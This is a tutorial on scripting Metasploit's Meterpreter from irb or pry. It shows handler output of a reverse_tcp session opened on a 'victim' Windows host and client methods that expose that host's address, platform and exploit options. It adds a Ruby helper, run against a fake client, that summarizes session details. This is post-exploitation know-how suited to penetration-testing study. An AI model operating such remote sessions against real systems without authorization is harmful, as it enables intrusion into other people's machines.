Meterpreter

From the official wiki: "The Meterpreter is an advanced payload that has been part of Metasploit since 2004. Originally written by Matt “skape” Miller, dozens of contributors have provided additional code, and the payload continues to be frequently updated as part of Metasploit development."

Meterpreter is a payload framework that exposes an API you can drive from scripts and plugins to extend what it can do. The legacy Meterpreter scripts that you invoke with run during post exploitation (scraper, for example) live in metasploit-framework/scripts/meterpreter; commands such as getuid, getsystem and migrate are built into the core and its extensions rather than shipped as scripts. The Ruby side of Meterpreter, the client code Metasploit uses to talk to the payload, is located in metasploit-framework/lib/rex/post/meterpreter.

You can't really appreciate the power of Meterpreter until you read its wishlist and feature list rather than just using it.

To get started, get a Meterpreter shell on a victim machine so we can practice interactively; after that we can write some scripts.

Once you have the Meterpreter shell, type irb to be dropped into Ruby's IRB; most of the modules you need are already loaded. Then type require 'irb/completion' to enable tab completion in the IRB console, like this:

    msf exploit(handler) > exploit
    [*] Started reverse handler on 192.168.0.18:4444
    [*] Starting the payload handler...
    [*] Sending stage (957486 bytes) to 192.168.0.18
    [*] Meterpreter session 1 opened (192.168.0.18:4444 -> 192.168.0.18:33603) at 2015-11-22 06:33:00 +0300
    meterpreter > irb
    [*] Starting IRB shell
    [*] The 'client' variable holds the Meterpreter client
    >> require 'irb/completion'
    => true

If you would like to use Pry instead of IRB, type pry, then set a shorter prompt to make the console more readable. Personally, I'd prefer pry.

    meterpreter > pry
    _pry_.prompt = proc { "-> " }

As you can see, you've been dropped into a Ruby console with a variable called client that holds the client object for the running Meterpreter session.

Try this as a start:

    print_good("Rubyfu!")

To list all methods available on the client instance (methods returns an array, so print it):

    puts client.methods.sort

Let's check some of the interesting methods there.

  • Victim's IP address and port
    client.session_host
    client.session_port
  • Victim's computer information and platform
    client.info
    client.platform

Returns:

    => "win7-64-victim\\Workshop @ WIN7-64-VICTIM"
    => "x86/win32"

  • Get the datastore of the exploit that produced this session
    client.exploit_datastore
    # Or
    client.exploit.datastore

This returns a hash containing all the exploit and payload options that resulted in this Meterpreter session:

    {"VERBOSE"=>false, "WfsDelay"=>0, "EnableContextEncoding"=>false, "DisablePayloadHandler"=>false, "ExitOnSession"=>true, "ListenerTimeout"=>0, "payload"=>"windows/meterpreter/reverse_tcp", "LPORT"=>4444, "ReverseConnectRetries"=>5, "ReverseAllowProxy"=>false, "ReverseListenerThreaded"=>false, "PayloadUUIDTracking"=>false, "EnableStageEncoding"=>false, "StageEncoderSaveRegisters"=>"", "StageEncodingFallback"=>true, "PrependMigrate"=>false, "EXITFUNC"=>"process", "AutoLoadStdapi"=>true, "AutoVerifySession"=>true, "AutoVerifySessionTimeout"=>30, "InitialAutoRunScript"=>"", "AutoRunScript"=>"", "AutoSystemInfo"=>true, "EnableUnicodeEncoding"=>false, "SessionRetryTotal"=>3600, "SessionRetryWait"=>10, "SessionExpirationTimeout"=>604800, "SessionCommunicationTimeout"=>300, "lhost"=>"192.168.0.18", "ReverseListenerBindPort"=>0, "TARGET"=>0}
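Putting the methods above together, here is an added example (not code from Rubyfu or from Metasploit) of the kind of helper you would write in the irb/pry console: it filters client.methods for the names worth exploring first, then builds a session summary from session_host, session_port, info, platform and the exploit datastore, picking out the options that say how the payload was built and how long the session lives (EXITFUNC, PrependMigrate, SessionExpirationTimeout, SessionCommunicationTimeout). The helper functions only call the client methods shown on this page, so they can be pasted into a live console as they are. FakeClient and FAKE_CLIENT are a constructed stand-in filled with the sample values printed above, so the file also runs outside Metasploit; the INTERESTING_OPTIONS list and the helper names are this example's own choices.

```ruby
# Added example for this page; not code from Rubyfu or from Metasploit.
# The helpers only use client methods shown on the page (session_host,
# session_port, info, platform, exploit_datastore). FakeClient is a
# constructed stand-in so the file runs without a live Meterpreter session.

# Datastore keys (from the hash printed on the page) that explain how the
# session was built and how long it will be kept alive.
INTERESTING_OPTIONS = %w[payload lhost LPORT EXITFUNC PrependMigrate
                         SessionExpirationTimeout SessionCommunicationTimeout].freeze

# Narrow `client.methods.sort` down to the names worth looking at first.
def interesting_methods(client)
  client.methods.sort.grep(/session|platform|info|datastore/)
end

# Collect host, port, platform and the selected datastore options into a hash.
# The real Msf datastore is case-insensitive; the plain Hash in the stand-in is
# not, so the keys are spelled exactly as the page prints them.
def session_summary(client)
  ds = client.exploit_datastore
  options = INTERESTING_OPTIONS.each_with_object({}) do |key, h|
    h[key] = ds[key] if ds.key?(key)
  end
  {
    host:     client.session_host,
    port:     client.session_port,
    info:     client.info,
    platform: client.platform,
    options:  options
  }
end

# Render the summary as printable lines (inside msf you would hand each line
# to print_status or print_good instead of puts).
def format_summary(summary)
  lines = ["Session #{summary[:host]}:#{summary[:port]} (#{summary[:platform]})",
           "Info: #{summary[:info]}"]
  summary[:options].each { |k, v| lines << "  #{k.ljust(28)} #{v.inspect}" }
  lines.join("\n")
end

# Constructed stand-in for `client`; the values are the ones shown on the page.
FakeClient = Struct.new(:session_host, :session_port, :info, :platform,
                        :exploit_datastore, keyword_init: true)

FAKE_CLIENT = FakeClient.new(
  session_host:      "192.168.0.18",
  session_port:      33603,
  info:              "win7-64-victim\\Workshop @ WIN7-64-VICTIM",
  platform:          "x86/win32",
  exploit_datastore: {
    "payload" => "windows/meterpreter/reverse_tcp", "LPORT" => 4444,
    "lhost" => "192.168.0.18", "EXITFUNC" => "process", "PrependMigrate" => false,
    "SessionExpirationTimeout" => 604800, "SessionCommunicationTimeout" => 300,
    "TARGET" => 0
  }
)

if __FILE__ == $PROGRAM_NAME
  puts interesting_methods(FAKE_CLIENT).inspect
  puts format_summary(session_summary(FAKE_CLIENT))
end
```

In a real session replace FAKE_CLIENT with client, e.g. puts format_summary(session_summary(client)) from the irb or pry prompt; SessionExpirationTimeout (a week, in seconds) and SessionCommunicationTimeout (five minutes) are the two values to check when a session that should have died is still around, or one that should be alive keeps dropping.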